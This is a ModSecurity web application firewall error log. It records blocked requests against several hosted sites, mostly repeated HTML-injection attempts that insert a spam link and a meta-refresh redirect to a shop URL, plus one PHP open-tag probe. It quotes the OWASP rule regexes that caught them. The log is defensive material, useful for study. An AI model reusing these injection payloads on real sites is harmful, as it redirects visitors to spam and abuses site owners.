[Mon May 11 19:48:51.805368 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:55.085981 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.087845 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.088510 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.088892 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.090148 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.090617 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:55.091184 2026] [security2:error] [pid 1516058:tid 1516090] [client 27.78.84.116:55723] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWhyMeXtzav-mi9SyaAAAAAMA"]
[Mon May 11 19:48:58.939771 2026] [security2:error] [pid 1502013:tid 1502046] [client 23.21.250.48:20586] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>turbo/afficheFormation.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>turbo/afficheFormation.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWipYn-x0CHsbEbP2WRQAAAJQ"]
[Mon May 11 19:48:58.940316 2026] [security2:error] [pid 1502013:tid 1502046] [client 23.21.250.48:20586] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWipYn-x0CHsbEbP2WRQAAAJQ"]
[Mon May 11 19:48:59.032687 2026] [security2:error] [pid 1502013:tid 1502046] [client 23.21.250.48:20586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIWipYn-x0CHsbEbP2WRQAAAJQ"]
[Mon May 11 19:49:01.004221 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:01.151740 2026] [security2:error] [pid 1516058:tid 1516094] [client 170.106.113.235:36678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/archives.html"] [unique_id "agIWiiMeXtzav-mi9SyaBwAAAMQ"]
[Mon May 11 19:49:01.944329 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:01.945720 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:02.165231 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:02.166523 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:02.166984 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:02.167749 2026] [security2:error] [pid 1501831:tid 1501833] [client 27.78.84.116:56122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWjVNddpkriGUb6ZVf7gAAAQA"]
[Mon May 11 19:49:09.224718 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:09.225126 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:09.230975 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:09.254951 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:09.256017 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
[Mon May 11 19:49:09.256485 2026] [security2:error] [pid 1516058:tid 1516112] [client 27.78.84.116:56761] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWlSMeXtzav-mi9SyaFwAAANY"]
